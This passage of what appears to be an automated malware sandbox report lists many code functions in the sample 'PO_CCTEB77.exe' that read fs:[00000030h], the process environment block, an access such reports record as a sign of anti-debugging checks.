            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_017FE443 mov eax, dword ptr fs:[00000030h]3_2_017FE443
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_017FE443 mov eax, dword ptr fs:[00000030h]3_2_017FE443
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_017FE443 mov eax, dword ptr fs:[00000030h]3_2_017FE443
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_017FE443 mov eax, dword ptr fs:[00000030h]3_2_017FE443
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_017FE443 mov eax, dword ptr fs:[00000030h]3_2_017FE443
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_017FE443 mov eax, dword ptr fs:[00000030h]3_2_017FE443
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_017FE443 mov eax, dword ptr fs:[00000030h]3_2_017FE443
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_017FE443 mov eax, dword ptr fs:[00000030h]3_2_017FE443
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_017FA430 mov eax, dword ptr fs:[00000030h]3_2_017FA430
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_017BE420 mov eax, dword ptr fs:[00000030h]3_2_017BE420
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_017BE420 mov eax, dword ptr fs:[00000030h]3_2_017BE420
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_017BE420 mov eax, dword ptr fs:[00000030h]3_2_017BE420
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_017BC427 mov eax, dword ptr fs:[00000030h]3_2_017BC427
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_017F8402 mov eax, dword ptr fs:[00000030h]3_2_017F8402
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_017F8402 mov eax, dword ptr fs:[00000030h]3_2_017F8402
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_017F8402 mov eax, dword ptr fs:[00000030h]3_2_017F8402
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_017C04E5 mov ecx, dword ptr fs:[00000030h]3_2_017C04E5
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_01846420 mov eax, dword ptr fs:[00000030h]3_2_01846420
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_01846420 mov eax, dword ptr fs:[00000030h]3_2_01846420
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_01846420 mov eax, dword ptr fs:[00000030h]3_2_01846420
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_01846420 mov eax, dword ptr fs:[00000030h]3_2_01846420
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_01846420 mov eax, dword ptr fs:[00000030h]3_2_01846420
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_01846420 mov eax, dword ptr fs:[00000030h]3_2_01846420
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_01846420 mov eax, dword ptr fs:[00000030h]3_2_01846420
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_017F44B0 mov ecx, dword ptr fs:[00000030h]3_2_017F44B0
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_017C64AB mov eax, dword ptr fs:[00000030h]3_2_017C64AB
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_0184C460 mov ecx, dword ptr fs:[00000030h]3_2_0184C460
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_0186678E mov eax, dword ptr fs:[00000030h]3_2_0186678E
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_017C8770 mov eax, dword ptr fs:[00000030h]3_2_017C8770
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_017D0770 mov eax, dword ptr fs:[00000030h]3_2_017D0770
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_017D0770 mov eax, dword ptr fs:[00000030h]3_2_017D0770
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_017D0770 mov eax, dword ptr fs:[00000030h]3_2_017D0770
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_017D0770 mov eax, dword ptr fs:[00000030h]3_2_017D0770
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_017D0770 mov eax, dword ptr fs:[00000030h]3_2_017D0770
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_017D0770 mov eax, dword ptr fs:[00000030h]3_2_017D0770
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_017D0770 mov eax, dword ptr fs:[00000030h]3_2_017D0770
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_017D0770 mov eax, dword ptr fs:[00000030h]3_2_017D0770
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_017D0770 mov eax, dword ptr fs:[00000030h]3_2_017D0770
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_017D0770 mov eax, dword ptr fs:[00000030h]3_2_017D0770
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_017D0770 mov eax, dword ptr fs:[00000030h]3_2_017D0770
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_017D0770 mov eax, dword ptr fs:[00000030h]3_2_017D0770
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_017C0750 mov eax, dword ptr fs:[00000030h]3_2_017C0750
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_017F674D mov esi, dword ptr fs:[00000030h]3_2_017F674D
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_017F674D mov eax, dword ptr fs:[00000030h]3_2_017F674D
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_017F674D mov eax, dword ptr fs:[00000030h]3_2_017F674D
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_017F273C mov eax, dword ptr fs:[00000030h]3_2_017F273C
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_017F273C mov ecx, dword ptr fs:[00000030h]3_2_017F273C
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_017F273C mov eax, dword ptr fs:[00000030h]3_2_017F273C
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_018407C3 mov eax, dword ptr fs:[00000030h]3_2_018407C3
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_017FC720 mov eax, dword ptr fs:[00000030h]3_2_017FC720
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_017FC720 mov eax, dword ptr fs:[00000030h]3_2_017FC720
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_0184E7E1 mov eax, dword ptr fs:[00000030h]3_2_0184E7E1
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_017C0710 mov eax, dword ptr fs:[00000030h]3_2_017C0710
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_017F0710 mov eax, dword ptr fs:[00000030h]3_2_017F0710
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_017FC700 mov eax, dword ptr fs:[00000030h]3_2_017FC700
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_017C47FB mov eax, dword ptr fs:[00000030h]3_2_017C47FB
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_017C47FB mov eax, dword ptr fs:[00000030h]3_2_017C47FB
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_017E27ED mov eax, dword ptr fs:[00000030h]3_2_017E27ED
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_017E27ED mov eax, dword ptr fs:[00000030h]3_2_017E27ED
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_017E27ED mov eax, dword ptr fs:[00000030h]3_2_017E27ED
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_0183C730 mov eax, dword ptr fs:[00000030h]3_2_0183C730
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_017CC7C0 mov eax, dword ptr fs:[00000030h]3_2_017CC7C0
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_01802750 mov eax, dword ptr fs:[00000030h]3_2_01802750
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_01802750 mov eax, dword ptr fs:[00000030h]3_2_01802750
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_01844755 mov eax, dword ptr fs:[00000030h]3_2_01844755
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_017C07AF mov eax, dword ptr fs:[00000030h]3_2_017C07AF
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_0184E75D mov eax, dword ptr fs:[00000030h]3_2_0184E75D
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_017F2674 mov eax, dword ptr fs:[00000030h]3_2_017F2674
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_017FA660 mov eax, dword ptr fs:[00000030h]3_2_017FA660
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_017FA660 mov eax, dword ptr fs:[00000030h]3_2_017FA660
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_017DC640 mov eax, dword ptr fs:[00000030h]3_2_017DC640
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_017C262C mov eax, dword ptr fs:[00000030h]3_2_017C262C
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_017DE627 mov eax, dword ptr fs:[00000030h]3_2_017DE627
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_017F8620 mov eax, dword ptr fs:[00000030h]3_2_017F8620
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_017F6620 mov eax, dword ptr fs:[00000030h]3_2_017F6620
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_0183E6F2 mov eax, dword ptr fs:[00000030h]3_2_0183E6F2
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_0183E6F2 mov eax, dword ptr fs:[00000030h]3_2_0183E6F2
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_0183E6F2 mov eax, dword ptr fs:[00000030h]3_2_0183E6F2
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_0183E6F2 mov eax, dword ptr fs:[00000030h]3_2_0183E6F2
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_018406F1 mov eax, dword ptr fs:[00000030h]3_2_018406F1
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_018406F1 mov eax, dword ptr fs:[00000030h]3_2_018406F1
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_017D260B mov eax, dword ptr fs:[00000030h]3_2_017D260B
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_017D260B mov eax, dword ptr fs:[00000030h]3_2_017D260B
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_017D260B mov eax, dword ptr fs:[00000030h]3_2_017D260B
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_017D260B mov eax, dword ptr fs:[00000030h]3_2_017D260B
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_017D260B mov eax, dword ptr fs:[00000030h]3_2_017D260B
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_017D260B mov eax, dword ptr fs:[00000030h]3_2_017D260B
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_017D260B mov eax, dword ptr fs:[00000030h]3_2_017D260B
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_0183E609 mov eax, dword ptr fs:[00000030h]3_2_0183E609
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_01802619 mov eax, dword ptr fs:[00000030h]3_2_01802619
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_017FA6C7 mov ebx, dword ptr fs:[00000030h]3_2_017FA6C7
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_017FA6C7 mov eax, dword ptr fs:[00000030h]3_2_017FA6C7
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_017F66B0 mov eax, dword ptr fs:[00000030h]3_2_017F66B0
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_017FC6A6 mov eax, dword ptr fs:[00000030h]3_2_017FC6A6
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_0188866E mov eax, dword ptr fs:[00000030h]3_2_0188866E
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_0188866E mov eax, dword ptr fs:[00000030h]3_2_0188866E
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_017C4690 mov eax, dword ptr fs:[00000030h]3_2_017C4690
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_017C4690 mov eax, dword ptr fs:[00000030h]3_2_017C4690
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_017E6962 mov eax, dword ptr fs:[00000030h]3_2_017E6962
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_017E6962 mov eax, dword ptr fs:[00000030h]3_2_017E6962
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_017E6962 mov eax, dword ptr fs:[00000030h]3_2_017E6962
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_018489B3 mov esi, dword ptr fs:[00000030h]3_2_018489B3
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_018489B3 mov eax, dword ptr fs:[00000030h]3_2_018489B3
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_018489B3 mov eax, dword ptr fs:[00000030h]3_2_018489B3
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_018569C0 mov eax, dword ptr fs:[00000030h]3_2_018569C0
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_0188A9D3 mov eax, dword ptr fs:[00000030h]3_2_0188A9D3
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_017B8918 mov eax, dword ptr fs:[00000030h]3_2_017B8918
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_017B8918 mov eax, dword ptr fs:[00000030h]3_2_017B8918
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_0184E9E0 mov eax, dword ptr fs:[00000030h]3_2_0184E9E0
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_017F29F9 mov eax, dword ptr fs:[00000030h]3_2_017F29F9
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_017F29F9 mov eax, dword ptr fs:[00000030h]3_2_017F29F9
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_0183E908 mov eax, dword ptr fs:[00000030h]3_2_0183E908
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_0183E908 mov eax, dword ptr fs:[00000030h]3_2_0183E908
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_0184C912 mov eax, dword ptr fs:[00000030h]3_2_0184C912
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_017CA9D0 mov eax, dword ptr fs:[00000030h]3_2_017CA9D0
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_017CA9D0 mov eax, dword ptr fs:[00000030h]3_2_017CA9D0
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_017CA9D0 mov eax, dword ptr fs:[00000030h]3_2_017CA9D0
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_017CA9D0 mov eax, dword ptr fs:[00000030h]3_2_017CA9D0
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_017CA9D0 mov eax, dword ptr fs:[00000030h]3_2_017CA9D0
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_017CA9D0 mov eax, dword ptr fs:[00000030h]3_2_017CA9D0
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_0184892A mov eax, dword ptr fs:[00000030h]3_2_0184892A
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_0185892B mov eax, dword ptr fs:[00000030h]3_2_0185892B
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_017F49D0 mov eax, dword ptr fs:[00000030h]3_2_017F49D0
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_01840946 mov eax, dword ptr fs:[00000030h]3_2_01840946
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_017C09AD mov eax, dword ptr fs:[00000030h]3_2_017C09AD
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_017C09AD mov eax, dword ptr fs:[00000030h]3_2_017C09AD
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_017D29A0 mov eax, dword ptr fs:[00000030h]3_2_017D29A0
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_017D29A0 mov eax, dword ptr fs:[00000030h]3_2_017D29A0
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_017D29A0 mov eax, dword ptr fs:[00000030h]3_2_017D29A0
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_017D29A0 mov eax, dword ptr fs:[00000030h]3_2_017D29A0
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_017D29A0 mov eax, dword ptr fs:[00000030h]3_2_017D29A0
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_017D29A0 mov eax, dword ptr fs:[00000030h]3_2_017D29A0
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_017D29A0 mov eax, dword ptr fs:[00000030h]3_2_017D29A0
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_017D29A0 mov eax, dword ptr fs:[00000030h]3_2_017D29A0
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_017D29A0 mov eax, dword ptr fs:[00000030h]3_2_017D29A0
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_017D29A0 mov eax, dword ptr fs:[00000030h]3_2_017D29A0
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_017D29A0 mov eax, dword ptr fs:[00000030h]3_2_017D29A0
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_017D29A0 mov eax, dword ptr fs:[00000030h]3_2_017D29A0
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_017D29A0 mov eax, dword ptr fs:[00000030h]3_2_017D29A0
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_0180096E mov eax, dword ptr fs:[00000030h]3_2_0180096E
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_0180096E mov edx, dword ptr fs:[00000030h]3_2_0180096E
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_0180096E mov eax, dword ptr fs:[00000030h]3_2_0180096E
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_0184C97C mov eax, dword ptr fs:[00000030h]3_2_0184C97C
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_01864978 mov eax, dword ptr fs:[00000030h]3_2_01864978
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_01864978 mov eax, dword ptr fs:[00000030h]3_2_01864978
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_0184C89D mov eax, dword ptr fs:[00000030h]3_2_0184C89D
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_017C4859 mov eax, dword ptr fs:[00000030h]3_2_017C4859
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_017C4859 mov eax, dword ptr fs:[00000030h]3_2_017C4859
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_017F0854 mov eax, dword ptr fs:[00000030h]3_2_017F0854
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_017D2840 mov ecx, dword ptr fs:[00000030h]3_2_017D2840
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_017E2835 mov eax, dword ptr fs:[00000030h]3_2_017E2835
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_017E2835 mov eax, dword ptr fs:[00000030h]3_2_017E2835
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_017E2835 mov eax, dword ptr fs:[00000030h]3_2_017E2835
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_017E2835 mov ecx, dword ptr fs:[00000030h]3_2_017E2835
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_017E2835 mov eax, dword ptr fs:[00000030h]3_2_017E2835
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_017E2835 mov eax, dword ptr fs:[00000030h]3_2_017E2835
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_017FA830 mov eax, dword ptr fs:[00000030h]3_2_017FA830
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_0188A8E4 mov eax, dword ptr fs:[00000030h]3_2_0188A8E4
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_017FC8F9 mov eax, dword ptr fs:[00000030h]3_2_017FC8F9
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_017FC8F9 mov eax, dword ptr fs:[00000030h]3_2_017FC8F9
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_0184C810 mov eax, dword ptr fs:[00000030h]3_2_0184C810
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_0186483A mov eax, dword ptr fs:[00000030h]3_2_0186483A
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_0186483A mov eax, dword ptr fs:[00000030h]3_2_0186483A
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_017EE8C0 mov eax, dword ptr fs:[00000030h]3_2_017EE8C0
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_01856870 mov eax, dword ptr fs:[00000030h]3_2_01856870
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_01856870 mov eax, dword ptr fs:[00000030h]3_2_01856870
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_0184E872 mov eax, dword ptr fs:[00000030h]3_2_0184E872
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_0184E872 mov eax, dword ptr fs:[00000030h]3_2_0184E872
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_017C0887 mov eax, dword ptr fs:[00000030h]3_2_017C0887
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_017BCB7E mov eax, dword ptr fs:[00000030h]3_2_017BCB7E
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_0186EBD0 mov eax, dword ptr fs:[00000030h]3_2_0186EBD0
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_017EEB20 mov eax, dword ptr fs:[00000030h]3_2_017EEB20
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_017EEB20 mov eax, dword ptr fs:[00000030h]3_2_017EEB20
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_0184CBF0 mov eax, dword ptr fs:[00000030h]3_2_0184CBF0
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_017EEBFC mov eax, dword ptr fs:[00000030h]3_2_017EEBFC
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_017C8BF0 mov eax, dword ptr fs:[00000030h]3_2_017C8BF0
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_017C8BF0 mov eax, dword ptr fs:[00000030h]3_2_017C8BF0
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_017C8BF0 mov eax, dword ptr fs:[00000030h]3_2_017C8BF0
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_0183EB1D mov eax, dword ptr fs:[00000030h]3_2_0183EB1D
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_0183EB1D mov eax, dword ptr fs:[00000030h]3_2_0183EB1D
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_0183EB1D mov eax, dword ptr fs:[00000030h]3_2_0183EB1D
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_0183EB1D mov eax, dword ptr fs:[00000030h]3_2_0183EB1D
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_0183EB1D mov eax, dword ptr fs:[00000030h]3_2_0183EB1D
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_0183EB1D mov eax, dword ptr fs:[00000030h]3_2_0183EB1D
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_0183EB1D mov eax, dword ptr fs:[00000030h]3_2_0183EB1D
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_0183EB1D mov eax, dword ptr fs:[00000030h]3_2_0183EB1D
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_0183EB1D mov eax, dword ptr fs:[00000030h]3_2_0183EB1D
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_01888B28 mov eax, dword ptr fs:[00000030h]3_2_01888B28
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_01888B28 mov eax, dword ptr fs:[00000030h]3_2_01888B28
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_017C0BCD mov eax, dword ptr fs:[00000030h]3_2_017C0BCD
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_017C0BCD mov eax, dword ptr fs:[00000030h]3_2_017C0BCD
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_017C0BCD mov eax, dword ptr fs:[00000030h]3_2_017C0BCD
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_017E0BCB mov eax, dword ptr fs:[00000030h]3_2_017E0BCB
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_017E0BCB mov eax, dword ptr fs:[00000030h]3_2_017E0BCB
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_017E0BCB mov eax, dword ptr fs:[00000030h]3_2_017E0BCB
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_017D0BBE mov eax, dword ptr fs:[00000030h]3_2_017D0BBE
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_017D0BBE mov eax, dword ptr fs:[00000030h]3_2_017D0BBE
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_01868B42 mov eax, dword ptr fs:[00000030h]3_2_01868B42
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_01856B40 mov eax, dword ptr fs:[00000030h]3_2_01856B40
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_01856B40 mov eax, dword ptr fs:[00000030h]3_2_01856B40
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_0188AB40 mov eax, dword ptr fs:[00000030h]3_2_0188AB40
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_01894A80 mov eax, dword ptr fs:[00000030h]3_2_01894A80
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_017FCA6F mov eax, dword ptr fs:[00000030h]3_2_017FCA6F
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_017FCA6F mov eax, dword ptr fs:[00000030h]3_2_017FCA6F
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_017FCA6F mov eax, dword ptr fs:[00000030h]3_2_017FCA6F
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_01816AA4 mov eax, dword ptr fs:[00000030h]3_2_01816AA4
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_017D0A5B mov eax, dword ptr fs:[00000030h]3_2_017D0A5B
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_017D0A5B mov eax, dword ptr fs:[00000030h]3_2_017D0A5B
